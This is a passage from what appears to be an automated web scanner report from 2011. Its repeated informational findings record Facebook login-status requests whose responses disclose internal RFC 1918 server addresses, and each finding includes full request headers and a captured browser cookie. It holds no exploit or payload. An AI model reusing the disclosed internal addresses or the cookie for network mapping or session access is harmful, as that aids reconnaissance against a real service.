GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20f859a6%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19416de58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d6dfa6ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10c49bee4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d6dfa6ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb3fb951%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d6dfa6ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e81367a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d6dfa6ec&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.67.44
X-Cnection: close
Date: Thu, 16 Jun 2011 15:31:29 GMT
Content-Length: 22

Invalid Application ID

19.630. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.68.41

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df253b2fce4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1852b0e38%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b5fb03c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30ddf66f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b5fb03c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df87b0b5b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b5fb03c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df603fd59%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b5fb03c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.68.41
X-Cnection: close
Date: Thu, 16 Jun 2011 15:15:59 GMT
Content-Length: 22

Invalid Application ID

19.631. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.189.61

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfce5528a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df315dca6d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f9264b94%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c2ed834c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f9264b94&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3602977a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f9264b94&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1eec41f9c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f9264b94&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.189.61
X-Cnection: close
Date: Thu, 16 Jun 2011 16:54:11 GMT
Content-Length: 22

Invalid Application ID

19.632. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.108.62

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10503ff54%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26f1e694%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0c0a09c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bb58f784%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0c0a09c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6f5391cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0c0a09c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a1ea174c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3859f0824%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0c0a09c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.108.62
X-Cnection: close
Date: Thu, 16 Jun 2011 12:15:07 GMT
Content-Length: 22

Invalid Application ID

19.633. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.173.35

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df54da91e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df59a8b89%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df964b264%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33159b5d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df964b264&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df111ddafa4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df964b264&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e04e8338%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df964b264&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.173.35
X-Cnection: close
Date: Thu, 16 Jun 2011 15:41:48 GMT
Content-Length: 22

Invalid Application ID

19.634. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.169.47

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3932e1e04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38740c178%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfbe9f9e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3fd2dcb7c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfbe9f9e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39dc20b08%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfbe9f9e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f3c9e624%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfbe9f9e&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.169.47
X-Cnection: close
Date: Thu, 16 Jun 2011 17:14:56 GMT
Content-Length: 22

Invalid Application ID

19.635. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.171.57

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ee702ca4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2415825b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3491420ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df204160c84%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3491420ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc6ab633%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3491420ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11e0b776c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3491420ec&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.57
X-Cnection: close
Date: Thu, 16 Jun 2011 16:33:31 GMT
Content-Length: 22

Invalid Application ID

19.636. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.95.65

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df82a3a16c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32cd12d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df166f76c8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35ac67534%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df166f76c8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28708cbf4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df166f76c8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c6b6a2e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df166f76c8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.65
X-Cnection: close
Date: Thu, 16 Jun 2011 12:04:39 GMT
Content-Length: 22

Invalid Application ID

19.637. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.27.110

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21c77fb9c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df164cff73%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8f210e4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11a3f420%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8f210e4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d35a4d58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8f210e4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ce4f9ee%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8f210e4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.27.110
X-Cnection: close
Date: Thu, 16 Jun 2011 13:58:30 GMT
Content-Length: 22

Invalid Application ID

19.638. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.19.52

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8623d03c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df94943da%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35af6512%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a45d01f%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35af6512&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30e47f15%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35af6512&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df976fe738%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df35af6512&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.19.52
X-Cnection: close
Date: Thu, 16 Jun 2011 13:17:11 GMT
Content-Length: 22

Invalid Application ID

19.639. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.94.65

Request

